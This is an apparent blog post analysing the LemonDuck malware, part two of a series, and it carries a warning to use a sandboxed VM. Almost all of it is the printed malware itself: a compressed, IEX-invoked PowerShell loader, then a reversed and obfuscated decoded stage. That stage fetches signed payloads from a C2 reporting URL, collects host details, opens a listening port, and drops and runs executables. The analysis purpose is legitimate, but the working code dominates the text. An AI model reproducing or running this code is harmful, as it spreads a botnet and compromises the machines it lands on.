This is the Second Article where we will be analyzing the LemonDuck malwar, [earlier] we analyzed the “mail.jsp” script which resulted in downloading and invoking of another script named “a.jsp”.
You can find resources related to the malware we will analyze from this github repository.
⚠️ Any domains/URLs/IPs or Scripts discovered while analyzing malware are malicious, I defanged these URLs to prevent any accidental click, Don’t Try to visit these Domains or run these Scripts on your host machine, always use a Sandboxed VM to perform experiments
Stage 0
The LemonDuck malware has various phases and stages, and for them it had different scripts like mail.jsp, 7p.php, report.jsp, a.jsp
We already analysed mail.jsp script,
We have the Malicious script a.jsp with us 👇🏻, Which we extracted in the last article.
1
IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227eb7dfeb60796f96a69f7d6f3a3f7ef5bdef7f3ffd28bd73e7d37bdf7f95cda7df1b7dfce6eaf4e3f4f4e4f8f92aafb7d387f6f3b3c54ff1e7e5cbfcd5c9769adef9f8374e7ee324bd93ded97b486dbe4d6dee3cfc547efbe4defd8f3ff9d8fcbebbfbfd57f427fed84a4fa7c7e5ea9420efdf93efe99b11c13efefc3bf42f7dfbfce5693dddfed4c2dca1067bbbdfa77f05dc01fdb6afa0777676e5b72d7d91bea37715b2c3873efe64e7be79e981bea3b8d09766a07889b078ba772ab828a67bda0b21b3abbf3244d3fb270f0e4290f5f69d336ab1f82990e8374e686cabe6a7c76d5d114def96f5faf7cfeb6a7abaf78cbe487fefd3b3d768742f6d66cb6a9abfde4e57795ebede26143ea1ffb775d672835fc2fffce2f9b4cd30ccf497fc187ff063e607ffbcd3e4edf5e4f7bfca6a02fffdef7fafc6e42d0b7aa1fae9ed2d744650e92ffa71f663face2fa6f9bfceeafa18afd26ba3dd6cdee0a7838539a0ff3fdbcadaece9f57951e797e3ac411f5be78582a9f3597159d52ff329b52c2eebfc75d5aeaeeb93dd63fafbdbafc7d7f355565fc867e3ebb6a875806b1af37891eb5fd4b6a5ff37d7afd3769afff4e4cbedabfc45fa59aa389961ee7f9a371921cb485d2cd163ddbee64f9f2caafad9a347df6f094922e8f7e8657f7421a1961745a33d2bc1c0a944b3ad654114a37709a636e00ef9779e5b8144bf02d822abb397a00828f56caba9f336c767faea4bccfde24c69a6281c3a8a815cf4a652ecf8f5ab3eb5944c2d2843a05fe42b857dfd663b2495e9d4ef6b77e7ddce6807ffe0376ad42ecdb096d5eadde91834d741e8e7dedbb3fbf4e2e453fae7c13efe99d03f07f7e89fcc00c1a70fe99f3c43cb07f4cf3e7ebb87770e0ef0ed39fd737f663e9be1cfbd07d42bf0dac577fcfa1efda3203f459373f4c2902778f700bf61863092c914efa2410e900ff1db397f86a67bc0343f7847ad0df04cbacbd07a179f3c008e3b68f81028cfa6d27a0ff8ece500675b6518c4010fec9e376674f72097d766f88309bd077a7d8a3fefe18d9d7bd2f1c35df9b93b73102618f10cad26960007a0ef145852fb1c78ece1bb3d26218f9227001841d630da1d1e137edb05f2423b0cec53203f43fb1cdf66408ac9f5a992f20110fe14b07680c51ebe9b7027fb32ac7b8025934f1fd3473c50f373b4837f667881473dc56ff7308a9c2700dd7f8a9e1f30e05cdebccf0c85fe78988c10932a0356f7ee9b3fcf791c7b4236fa030809ede8b79f1aed01ed195e79c8c4c37bbbe8760680538c5a78877f53a2331f01adfb6894cd18239288665dae67d517631103305943ff78526085fa250ba8d30422aad05c24adf4a32fb09e7cd2f79fe11fa73200e86356c9dc156b14d20edf6f97eb6a3a163dd5e440643cbef76017b6c7ff10a8ebd03cdd2f98e143a36dbebffb60773cdef99ebc6b74840561d5a11bf02fbe43dda5ed05e9971e2aacf75991923d2bb365718e4e05285b89595695cbabeae998344d514e27f995df910051dbc5360d064d00de794ab8ef9d6e93191ed1ff4fefff22854b7f6ce5d3ac349a2fafc76fa7eba7bfffb25ae4cf09dc27644fb7f1c9367f427f8de8ffd4ffc5f1769d375fd11f5bb35936a6899c65f9b7c70ac647d08cfcba6e7fecc7f47b35e1e006ccd94a0c373afb3df4279140ad39cfae471101c73dbcdb999d4cf2ef8e5b6202e207fa9359827eb2d60eb1b0483045f85fe9e4fb174bb274cdf7f8a32de621fe354d7f31bb12e9b22adae9727dce2f124abf90fecfb60c7f3c1cef802ab04684e9aa8095cf173ace6cb96af1c1aa5894f879fefb9f2fc1d553316ac48f67df1be5227a68bf28da1550320abb9e2ff475fcb85c9ceae7f407fa36787cffbe7e3e1eef7ccffc3e5b4070dea2dfad4e6b6aa68dbe777fb658749ae857d492dee7c6dfd38fa8f17981d6862b47702c8a459d6306bf6f265f7f626cf4cdef4f4dd62bf866a345be308313e99cd5ec7809cdb2a536cb2f8bdae873fcbd2cb24535c36fc4726bef8bfd4f1bd05bc8d854ea4a901fb1f57b6e81897e21013ffe9cfef9ce679f90723044657ef3c4e497907cec61461e8e1f8ee507fd2b22a3ef406a0ec6fc9f7e02c9f93db7a0cef259fde57c5a67f96b728fc8477bfde2694b7aea4ebeaedbcf667939c996f9aa4849d595c5f936735356af2f0a6285297db8ca66d9dbbaba6af3e5efbf776f595ca54d939553f540aa6271b5dde6175b605de7b3a6f4e017cc7096d793541f7cf6fdbdefe54b9e26c800f12533a5dfe217dfb9332b88339909d35f946fa7dfdfdd362f6da5b365b69d821d9e9e7efbf5d9f327c76f5e9f42d01b9a8896901e83a7495b113482900a42f97a59e0cbf417e3b33b65b95ebaf9e03ee40fb0baed89fe603002039c421fffe2f4f74897b3ef624e5250b92dac7a82c2e0de6964f0ee749876584b426035e506cb226534e753a24fc5b22b0cfe9925093e7b79f20658ac2a8cb9a5b8a065d5e100b1d0ff1274460cda34f9b4aa57e3dfdf0d6d342bf0e7336225c360e88f06b00bc06d5363d28d68f0946ed38f326fa8c98588014b4b315bb29fdfe44fb75392044c1dda689fda6cbb75da827e12637c96e303a369785e95bb53566cafab3704a29ecd8e5f9e31a669359fe6bf3855c280d43cd90b9ad85ff416ecffe964bce2f9cef5c51674afbedde69f5310d02c9f42e14250c4147fef33566fcc4ce87759353f8d79a2ffeffedebff7ef7da19833bf93e5d919ef5ed28fb2348eee9ce4e6aa7ad95c55b365f15dfa6aef1e036ee857f9f08a7e7b344de7d036d96abb2583f719ab52d04b474bb344ccb20d8ef924b7b2be64a3f8097d888066f65d23f1bfe417dfd9ddcacb627e7578670bf160338695a636870ff7eedffff4fb75be241c8ae7abe91b76e4dbfcedb47a8d5f55bd311fbf606f04246804134829d3f7a9551d5be9aa6dace4deb90345c758e9f7e96475b1f5c99d6531a9df627648c9ca2ffbf98c43daf47c7ab1c550d485805effbdca6c0a4bc272c46284efec2b70eb4ec90e9e29dfd7bf174ca9171152bb8bcf4c73a757d45d008ee02ef6642c834ee8a30b68f0343328cb9f84b2fc72af8fb2e27cb1fce20d50667cc9d1c1a7da9aa012c28c2d7f7cac1d7efe1dbcc47833b606b809117ff11dd5ffaab032f9a3ae48c7f2af5bd4d1c7e2fac9e8e80f6f8039e888373e862299c8c0e877d8711d9e8e4e11c29cf3277b83c3b4a36469d8e217f1d64fe990ed9bfe78c9e8fae3441b375153fd5506ee8d7aeb9cbe2dece03cc6721c75ce14711e81fcbddb415fbfb6fc757ee6cd143eb22fbcf379eafccce10c59c76f0e6f9fad4818aca9154bfb4909570e7269bafafe795e7f0f6656fee71a80c9a9cdf31c4a239b54e5e7d26204fb0a1cdfe5edfa8b31e93af240ebf91b1719d09b2f0e297d010880f65900d7740c91a53f65ec1fb3ed42932d1e58e0fb99b18892817c10c54ff79eb17a99d1dfdfbdb3643a7ddf66899022fabd4f39c89a9dc1a089cd143a7b8a44006dd1c4718f4a4674ec3330d13b7f978fa93130247afceeab45fbbba7bf308d7d5ad495ff9982e4afaeefa6d72b32d5d3bbe96c31fd85e9762a08689b676412e08663ae7ee1eff7fbfd7e2036a1e154da2f7c6ac2065612d08a77a401bda92fc81fb621b5324d0ae48c38687972fa721be4d885463fbc7387d27f1c175132941cbe65f68a3c9fcfe10a3cd8a3380ba1fed6d627bfbf0018add8992423451f13a8b2a47414c4bdfe2e192952edcfc65f9e19f57ce8f88a06165246c78401db56fad92744ad4797500f39d8477a2483912fabf2642c787ca6f81cea3b34087e76b77884c493afc677eedc81255d9189cd9f023b0a8a699af53382c4bf0377fef3cbb3ef799a231dddb9f3fd3b122e0a7b6d8dc777763f611df03df96444614b5ec33cbebeae2950fbc28d9dc40193f4d38a9e84cc5b29b77fbd2a7ef03966cf22a3ad18897ea4bdc551deabeb3ae3fce7136a64bed517d1e83325c89def0345840f1af3b07d0d65e31d82b6e2f097fc92b70a00ceec2fbe0391dd912c027ba700f43d6bee492b91f9fe8c2970b8bbede2722212fd6ee994b6e576ca8d763e13a5c47e082090e303d6548527dc4fdf5388227cb195a92406b20f0e563c3dd1784a52c27c8e412aabf74501ea219006fae397fcfe6439c143f755351ffefe4b1e003e9331fce23bab7505dda06e9f604014f8258ac82fd9fd4c5bfce2bcc167d2a2cc7f892aa3d18a410b3b96a56177121691146aafc2f2b1f5e87ef11d8311911ff225543f54bac2de7f86cf0e310a15ac8f9180a17f349e8730fd1ef89ce989bfee5ac1c248f055090bbcfefd29a781e84e3143aa63a6a98ed9f84e10e83ba98885fc5b5d9afdaea0131188de3034f207a6d4c7c07e7f7f64bfff7d7a81bf3aa45fee84f43b8604f435cc670ae1176b737256d553050e8d0bdcd365bd6e59d60f7f89526fef9dfcdc32fe3abbe914b29e4a58a1f104e653c1009f79937d9b75df9a94c6c7489191626aa9f1096177ffe9171bf3dd34c3aa4b3062cbe94689019f8f11feca2cd11439f991c9a20935b8042af3336e2d6d3cad6b9980142e7f645e16154bfa15dd918a1531702ff23438c5ec2445f0fb443d13b450bf1b3a82fe6f649b7b1e3198113776ea02531f33f1640a887098c4e95db8381cfe14cf891317eb8bfa789bcd2d194ecc31b29a6085ed54e2b497dbbcbac49d33101d28541f01aae6db10bc2b17b252a38f45abad8cd96f8092fe6e31337402078987a0f3013786ec2487188abd4b504d331e387bb0a2188af505938214ddef0f83843f2ed1fdef0931e114aa498f7c7ff77b080c9192e320bc194bc2ecb34b6d40a2254e372514902ef8e298d8745991917805bac1e35b6ca794e4614e5367925e5a7a2f9d9ebcfaf2d929acfcf1d9d3b39f7c41bffcde6f3e3fe6b54b0ccf408148426a0cac8fd9f9d5463695439f1ac588be304afd933de320fca4b8d37ce7859ffa51240a25d81a88ea54c36aaecbe93b7208f329b9de39b9b02f8d37fdc53605ce669a4d3fc437e8b841c0ab9fad1c4efa89a076bb90d862a2efc610624c98214d189d4550071f078d77397d50b5c5b2fa22a7c4646957a65e21a7d5144ff55d3338ed8c725f36d7caf36d3cff8fd9fd83359495c0326b0ddaed9834574d1a6d3ea6fc08584c329f36d7811fde6caf8a311b4acc095901646bcc8b922b45c7ec75140d1656f5bb4bf315127e903af264168b757377f7eec34f3fbdb7ff6877bc43ff91b779f7eea3550b7f6a0e741d374aaa98ac137dc5068abe1a5b1b855c33e54696d63255d62f82815a6e6d89b794ffa028335af1a554cff84e6dfe7addae8a7afa3abbccbe038fb0cdcce763f9624c16d077c6284d25e3e21111228d4b0de9d82987410b91b09ca2f621c958e924b846d950b67bde16dfa5213d27bb715d4e0083123fc78c0325aacef357581fe94c297dc2b30a4d03d144c0202ae7977c7fe77b77ee882d6b7809679cafaedf5052d7f4f894eddb96fe098ffcf787f78df7809c7c6b0c1fe7a77e09ab8abd7b6f8e7949e017c1ee215db7a8ab67c8162b448efdd1f2f5b3372fe8c7c7ea3f860d3fe6d0dca439d15cd2af2f3e46b6d84257a42d6c281f050ffebf2437fb9534e7817c0cabd279eb632ca573470cf1cefede8e2cfe9013b87a9de7f533402a8becf2d83617b4aee1653492affbc529c9e7fc0a845092a51a3afe143925e88b1373f4f6f7c94f3893de8d67d27c0f7c429f01fd99328b99c7c9e7bb7789fd15187ba292a23ffc2529390c8464762229c3cf3e49a921273f7e71fa4bb0daad7ffee2df9d2748a20ea3c0b269d15ccf611a39a3fddd9492d8176a9beee4179444cea7bc3aff126c472250b11e33fcf152df421efc443f0c53a85f168bef2236dcda3a9545a2cf52b3d240ffe75504a3fe21606559d5949b3e21cb54fc2401ff18091f234b0614c1504be5bd0afed504ac24e7cd0cf8c9f90b2631af5f7c2c710e0b493323b594375073edd8e4b63d778e23ddb7d3e20dc91d7c8b65551764e1bfb7d5c0d0f1bb4559165fb077573fa356cb6cd540157f8ffbd3b522567505386c414b83d0b20ba3a831ffb5fe01cdc0aee2540602d9f8d866337faa4b0abbe672661d0db6205f1cbf7875fafa2b709b7a23207d6311a9a0707f723cc16acc332bda2434da0f32f0482660d2ac59fd2e63725e35553d2dbe38a63f6c731b2f411b81bcc49113562bd237f7c30a50341ca91db224f9ea4b10dcb111965330373c4ac3efe8d98c9711fed886770c926455ff94247e90bd67b697fc7836cdbe18d31a81e4a3d29f20a36a977dba129c3a53ddda0529590c3ae1c520c26176ac0a49e5c0f0a98faf3876c0f22954cf575f51a434a5c5f6faa589e1991c0412737e0248d4cc00ab7855e9635e3f00df8b53e826f8cd572fbff8f244fccd8f919e15fe360ea33138e41d64a4e48b65b1981df3b47d27fdbee9beac5e2dcf68c96bfd44e6593fffeeb8cc56c594acc34b0e4a20b314977c6f4b5e68380c25fbd13acfa25e9fc8d203b5a78f6767ea1759486ede5eda40e77bdfff188943edaafb866b47ad5845b66619d37ad1776544b2660a6e422ae38efbc2fac46b3129292f53fffe24de56051ccbb2cac33554ce64326ec5af98d3e79f892ffd8bef48107c2ad1aa76bdb091de78adbfcc7efaeae0c17a3c7310b43f0db63429feb1586acfed02c66671811c409be3a170427fb32eb22853322aa60905bc8eb6ddd097c8a6df70d4cceb1626a11ac36021bcc438985886bb031ffab135fdedf5618063995afb433035d40b4787fd3ea2c1bb075dd6b50dd0635e291c053fa84f334645832227b37c3eb2208cf1a869d1f6339b92674cf9ab8f79219135a7213f1202b55d053d9624af8913b451b572cb2202969987bd11fd8b068da4432d43d6d6f0f6a94b4d4580c54c4758a1dd6e292d42be1bf3730c8ec8343aa1df182b173e6b1cb332edb5c78f5935833f492317dbd7e89d72cddaab8e0e5f7f02ad7f0706ebd3dffd8ecbf76e7df2e956aa993c9708361c29f960c308480b3f78f8c9cec3f1f8fea79f3cb83f1e1fec6f7d5f338c5bacf148782dbd2c8d835fba411a1aebef78c74d0f1efe8249e04278981a4e2581bd3128f89cf4815b26b77d74260c6d95d67857f5ca066655bc3849c5390d1f2dc2097dfce23b8d1d30ad829bdfcd4ab86deb63240c47dd7b734a7f3976b248d1a75121226d74df1147066fc9ccde145b42e7ff04c1f08ad6914c3c4a9f138c6fc927cbb3ed54c8f2ad90bfd3628a3edd50b52ffa8ac2e99fd4105f80f7e26825c16b1b4ee3bb472750cbdeb0dd0c23686289ee278b4a2633f3c88f2958fe0eb93d4eec75b37a6548863b50de92cc13531da6f1089b2fc60a379ad0fbde8f7d6cd693185290cfb3587ecc1ed7bddd834f1f4eef3f78b03799eeddcfb34f1fe6f7f6f61eee650f1fcc76a69fee61fc662dd72e4d1693f1c5a70b7c25ebbd1fc3d6996fefcd1e66d97dc5effef4febdfcd34fe1bdceceb3fcc1cede6ebebbb393ed3cbcb7774f61ab947cac2bb1da01c1e739fe4ccc84b7d2a9a065c1d398c74f33ea749acd0e0eee7d7aff60f7c1f9eea7f7763ffd74ffc1ec7cba9b3d982830b392ee7554bfd581785f50e3ef9c7f9a9f9fef660f67b3fbf9fe03ed74e7fcdefebdbd1d4a07dc3382373b7f78bebfa3636153f31b27bfb1017e5e2870fbc59d038e3ff31f4013bd7ee4e4e3d1f7ebf665bb24e121d7bff8de67baa64b0d285edc4aa114e97769fb022ef2973fadeb1cef00e4fbf746949bcb4f96a7af4ecf4f5fbdcc9b2f9fbca2af4f2fdf5c9d7eff7362b837e451a55be3f46385474b90dfbfb7fbbda767cf915dfadd3ea1dcdeac785e9e7ebbf9ddd2ad5ff8517a987eeff8d5abecfafb8f1ebdca2ff3bac9b7d2dfededc1f2ded33bf4dd9860fc6e97f9ab275fbe3e5dd5f9b3d33a7f71928fdf7cd9bc79552c2fb6ee7c6f7774effb64213edefece97672f3efef80ebdf051fabb6da5cd4fa61f57e7af29d6a0cf3e229dff3d79e5fb0efc276848ea65fb32ab8be3c9f39c9648bf3c6fe815faefce4777d2df38f97f00'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
This seems to be encoded script Let’s Decode this, and see what it does
Stage 1
After Decoding the Script we get
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
$K8n3d =[chAR[]] " ))63]Rahc[,'TwE' ECALper- 93]Rahc[,'ImZ' ECAlPeRC- )'
) )29]RaHc[,)96]RaHc[+35'+']RaHc[+311]R'+'aHc[( EcAlpEr- 43]RaHc['+',ImZAGJImZEcALPErc-69]RaHc[,)0'+'21]'+'RaHc[+8'+'4]RaHc[+001]RaHc[(EcALPEr'+'c-63]RaHc[,)96]RaHc['+'+05]RaHc[+07]RaHc[( EcAlpE'+'r- 93]RaHc[,ImZD2EImZEcAlpEr- 421]RaHc[,)011]RaHc['+'+001]RaHc[+78]RaHc[( EcAlpEr-)I'+'mZ
AGJpsj.troper/lru_erocE2FAGJ XEIS
3 sdnoceS- peelS-ImZ+ImZtratS
}
}{hcta'+'c }
}
}
)setyb_warE2F]][rahc[ni'+'oj-( XEImZ+'+'ImZI
{ ))yarrAetybE2F,1ahsE2F,setyb_warE'+'2'+'F(ataDyfirev.asrE2F(fi
redivorPec'+'ivreSotpyrC1A'+'HS.yhpargotpyrC.ytirImZ+ImZuceS.meImZ+ImZ'+'t'+'syS tcejbO-weN = 1ahsE2F
)46esabE2'+'F(gn'+'irtS46esaBmorF::]trevnoc[ = yarrAetybE2F
)setyb_ngisImZ+ImZE2F]][r'+'ahc[(nioj- = 46eImZ+ImZsabE2ImZ+I'+'mZF
'+'
)smaraPasrE'+'2F(sretemaraImZ+ImZPtropmI.asrE2F
;redivorPecivre'+'SotpyrCASR.yhpargotpyrC.ytiruceS.metsyS emaNepImZ+ImZyT- tcejbO-weN = aImZ+ImZsrE2F
10x0,00x0,10x0 = tneImZ+ImZnopxE.'+'smaraPasImZ+ImZrE2F
d5x0,b6x0,74x0,7bx0,83x0,aeImZ+ImZx0,79x0,eax0,b7x0,4ax0,36x0,88x0,7fx0,5dx0,36x0,dfx0,27'+'x0,01x0,59x0,e2x0,ImZ+ImZ6fx0,f3x0,79x0,bdx0,89x0,'+'a0x0,bcx0,03x0,e6x0,93x0,fcx0,0dx0,24x0,e8x'+'0,59x0,ea'+'x0,a6x0,19x0,7ax0,04x0,97x0,dcx'+'0,21x0,2ex0,f9x0,7ax0,a8x0,87x0,43ImZ+ImZx0,7cx0,7ex'+'0,dcx0,10x0,25x0,6cx0,37x0,03'+'x0,91'+'x0,1dImZ+ImZx0,b2x0,d7x0,b9x0,e2x0,8bx0,c6x0,'+'eex0,29x0,2fx0,53x0,fbx0,88x0,c'+'dx0,06x0,1dx0,11x0,6fx0,f4x0,6ax0,dbx0,edx0,acx0,e6x0,69x0,'+'70x0,68x0,07x0,26x0,b3x0,f4x'+'0,3fx0,b6x0,73x0'+',dcx0'+',dcx0,0cx0,d3x0,25x0,c3x0,32x0,e4x0,eax0,6dx0,76x0,bex0'+',55x0,b7x0,c6x0,e6x0,37x0,a9x0,35x0,37x0,ffx0,f2'+'x0,ffx'+'0ImZ+Im'+'Z,28x0,d9x0,99x0,e5x0,14x0,d6x0,cbx0,79x0,bbx0,7ImZ+ImZdx0,8ax0,56x0,adx0'+' = suludoM.smaraP'+'as'+'rE2F
sretemaraPASR.yImZ+I'+'mZhpargo'+'tpyr'+'C.ytiruceS.metsyS tcejbO-weN '+'= '+'smaraPasrEImZ+'+'ImZ2F '+'
;]tnuoc.setyb_serE2F..371['+'setyb_serE2F = sImZ+ImZetyb_warE2FI'+'mZ+ImZ
;]171..0[setyb_ImZ+ImZserE2F = setyb_ngisE2F
{)371 tg- tnuoc.setyb_serE2F(fi
)lrulanifE2FImZ+ImZ(ataDdaolnwoD.tneilcbewE2F = setyb_serE2F
}{hctac }
))D'+'2E-D2E,D2EE5qImZ+ImZD2E(ecalpImZ+ImZer.kcuD_nomeLE2F+AGJ-kcuD-nomeLAGJ,AGJtnegA-resUAGJ(dda.sredaeH.ImZ+ImZtneilcbewE2F
{yrt ImZ+ImZ
AGJs'+'marapE2FAGJ+AGJ?AGJ+AGJlruE2FAGJ '+'= lrulanifE2F
tneilx0dCbeW.teN tcex0djbO-wx0deN = tneilcbewE2F
{yrt
)
lruE2F]gnirts[
(maraP
{ XEIS noitcnuf
)AGJ&AGJnioj-)AGJ9.0AGJ,trop'+'piE2F,emImZ+ImZanptE2F,pimlE2F,f_fno'+'cE'+'2F]tnI[,eIm'+'Z+ImZmitpuE2F,ImZ+ImZrhmE2F,pimE2F,vmEImZ+ImZ2F,)AGJAGJnioj-]5ImZ+ImZ..0[5ImZ+ImZdmr'+'klE2F(,)AGJAGJnioj-]5..0ImZ+ImZ[5dmmlE2F(,)AGJAGJniImZ+ImZoj-'+']5..0[ImZ+ImZ5dmfilE2FImZ+ImZ(,t'+'imrepE2F]ImZ+ImZtImZ+ImZnI[,rep_'+'upcE2F,memE2F,ImZ+'+'ImZdra'+'cE2F,emanupcE2F,evirdImZ+ImZE2F,niamodE2F,resuImZ+ImZE2F,46siE2F]tnI[,soE2ImZ+ImZF(@(+AGJ&'+'AG'+'J=+smaImZ+ImZrapE2F
}{hctac}))D2E'+'9.9.'+'9.9'+'D'+'2EImZ+ImZ,D2E8.8.8.8ImZ+ImZD2E(@('+'redrOhcraeSrevreSSNDteS.)eurt=delbanepi retlif- noitarugifnocretpadakrowten_23niw ssalc- tcejboimw-teg({yrt
}
}
'+'kaerb
]2[enilE2F = troppiE2F
{))diptE'+'2F qe- ]1-[enilE2F( dna- )AGJDEHSILBATSEAGJ(sniatnoc.tE2F(fi '+'
} eunitnoc {'+' )llunE2ImZ+ImZF qe- ImZ+Im'+'ZenilE2F( '+'fi
}_'+'E2F{ ? ndW)D2E D2E(tilpImZ+ImZs'+'.tE2F = e'+'nilE2F
{)nnocpctE2F ni tE2F(hcaerof
AGJAGJ=troppiE2F
PCT '+'pona- tatSteN = nnocpctE2F
)}e'+'manssecorp._E2ImZ+ImZF,di._E2F{hcaImZ+ImZerofndW1 '+'tsrif- ImZ+ImZtcejbo-tcelesndWg'+'ImZ+ImZnidnec'+'seD- upc trosndWssecorpImZ+ImZ-tIm'+'Z+ImZ'+'eg(=em'+'anptE2F,diptE2F
} gnirtSoTsserddAPI._E2F ohce{ hcaerof ndW )AGJmoc.qk'+'96b.pAGJ(sesserddAts'+'oHteG::]snD.teN.'+'metsyS[=pimlE'+'2F
nosj'+'.'+'1XXXgImZ+ImZifnocE5q0.1vE5qlleImZ+ImZhSrewoPswodniWE5q23metsysE5qswodniwE5q:c ht'+'ap-tset=f_fnoc'+'E2F
)D2E- D2E+emaImZ+ImZnerE2F+D2En'+'dW}{hctac}}{)1(elihw;)(trats.sE2F'+';92556]renetsiLpcT.'+'stekcoS.'+'tImZ+Im'+'ZeN.metsyS[=s'+'E2F{yrt ohceD2EImZ+ImZ( pts
}
))emanerE2FImZ+ImZ bpg(+)nibrkE2F 5dmrkE2F 4edocE2F fcg(( pts
{)r'+'Klaco'+'lE2F('+'fi
4edocE2F x'+'Ex0dI
AGJrKAGJ eImZ+ImZ'+'docg=4edocE2F
}
}
))eman'+'erE2F ImZ+ImZnib'+'gmE2F apg(+)nibgmE2F 5dmgmE2F 3edocE2F fcg(( pts
{)gnMTlacolE2F(fi
3edocE2'+'F xEx0dI
AImZ+ImZGJgnMTAGJ edocg=3edocE2F
'+'
{)46siE2F dna- )asiE2F ro- nsiE2F((fi'+'
}
}'+'
))emaner'+'E2F '+'nibmE2F a'+'p'+'g(+)nibmE2F 5dImZ+ImZm'+'mE2F 2edocE2F fcg(( pts
{)nMTlacolE'+'2F(ImZ+I'+'mZfi
2edocE2F xEx0dI
AGJnMTAGJ edocg=2edoImZ+ImZ'+'cImZ+ImZE2F
{)46siE2F(f'+'i
}
))emanerE2F bpg(+)nibfiE2F 5ImZ+ImZdmfiE2F 1edocE2F fcg(( pImZ+ImZts
{)fIlacolE2F(fi
1edocE2F xEx0dI
AGJfIAGJ edocg='+'1edocImZ+ImZ'+'E2F
}
D2E}{hctac})D2E'+'+lfE2F+D2ElacolE2F]fer[,D2ED2ED2E+lfE2F+D2E'+'lacoLeE5qlabolGD2ED2E,eurtE2F(xetuM.gnidaerhT tcejbO-we'+'N;esa'+'lfE2F=D2E+lfE2F+D2ElacolE2F{yrtD2E
{'+' )lfE2F(edocg noitcnuf
}
D2E- D2E+'+'emanE2F+D2End'+'W)nocE2F]][rahc[nioj-(XEx'+'0dID2E '+'
{)ImZ+Im'+'ZemanE2F(bpg noitImZ+ImZcnuf'+'
}
AGJexe.manfE2FE5q%pmt% & exe.manfE2FE5q%pmt% iro.manfE2FE5q%ImZ+ImZpmt% y/ ypoc c/ dmc& - emanE2ImZ+ImZFndWAGJ+)D2E&^^^D2E,'+'D2EImZ+ImZ&D2E(ecalp'+'er.'+')'+'D2EndW^^^D2E,D2EndWD2E(ecalper.)'+'D2EnibE2F setyBEP- '+'1tset;))001 tnuoC- modnaR-teGndW)721..1'+'((+_nibE2F,pemE2F(se'+'tyBllAeti'+'rW::]eliF.OI.metsyS[;D2ED2ED2E+AGJiro.manfE2FE5qImZ+ImZAGJ+D2ED2ED2EImZ+ImZ+pmt:v'+'neE2F=pemE2F;)(enolC.nibE2F=_nibE2F;ImZ+ImZ)00000001(setyBdaeR.)))sserpmoceD::]edoMnoisserpmoC.noisse'+'rpmoC.OI[(ImZ+I'+'mZ ,))])tnuoc.nocE2F(..)1+iE2F([nocE2F,(maert'+'SyromeM.OI.metsyS tc'+'ejImZ+ImZbO-weN( maertSpizG.'+'noisserpmImZ+ImZoC.OI.metsyS tcejbO-weN(redaeRyrani'+'B.OI tcejbO-ImZ+ImZweN(=nibE2F;)]iE2F..0[no'+'cE2F'+']][rahc[nioj-(xex0di;}}kImZ+ImZaerb{)a'+'0x0'+' qe- ]iE2F[noc'+'E2F(fi{)1=+iE2F;1-I'+'mZ+ImZtnu'+'oc.nocE2F tl- iE2F;0=ImZ'+'+ImZiE2F(rofD2E(
{)emanE2'+'F,manfE2F(apg noitcnuf
}
)'+'ImZ+ImZD2E&^^^D2E,D2E&D2E(e'+'calper.)D2EndW^^^D2E,D2End'+'WD2E(ecalper.)D2E}_5dmE2F=5dmfiE2F;_n'+'ocE2F=nocE2F{)puonE2FIm'+'Z+'+'ImZ(fi}ImZ+ImZ}1=puonE2F{esImZ+'+'ImZle})nocE2F,pfiE2F(setyBllImZ+ImZAetirW::]e'+'liF.OI.'+'metsyS[{)5dmfiE2Fqe-'+'tE2F(fi;nocE2F 5dmg=tE2F;)D2ED2ED2E+'+'sm'+'arapE2F+D2E?D2E+nfE2F+D2E/D2EImZ+Im'+'ZD2E+lr'+'u_nwodE2FImZ+ImZ(ataddaolnwod.)tneilx0dCbeW.ImZ+I'+'mZteN tcex0djbO-wx0deN(=nocE2F{)puonE2F!(fi}}1='+'puonE2F{)5dmfiE2Fqe-_5dmE2F(fi;_nocE2F 5dmg=_5'+'dmE2F;'+')pfiE2F(setyBllAdaeR::]eliF.OI.metsyS[=_nocE2F{)pfiE2F htap-tset(fi}sEImZ+ImZ2F nrute'+'r;})D2ED2E2xD2ED2E(gnirtSoT._E2F=+sE2F{hcaerofndW)nocImZ+ImZE2F(hsaHe'+'tupmo'+'C.)(etaerC::]5DM.yhpargotpyrC.ytiruceS.metsyS[{)nocE2F(5dmg noitcnuf;ImZ+ImZD2ED'+'2ED2E+lru_nImZ'+'+ImZwodE2F+D2ImZ+ImZED2ED2EImZ+ImZ=lru_nwodE2F;D2ED2ED2E+nfE2F+D2EE5qD2ED2ImZ+ImZE+pmt:vneE'+'2F=pfiE2F;D2ED2ED2E+dmE2F+D2ED2ED2E=5dmfiE2F;D'+'2E+edocE2F+D2E ohceD2'+'E'+'(
{)nfE2F,dmE2F,edocEI'+'mZ+ImZ2F(fcg noitcnuf
}
AGJargE2F c/AGJ ts'+'iLtnemugrA- exe.dmc htaP'+'eliF- ssecorP-tratS
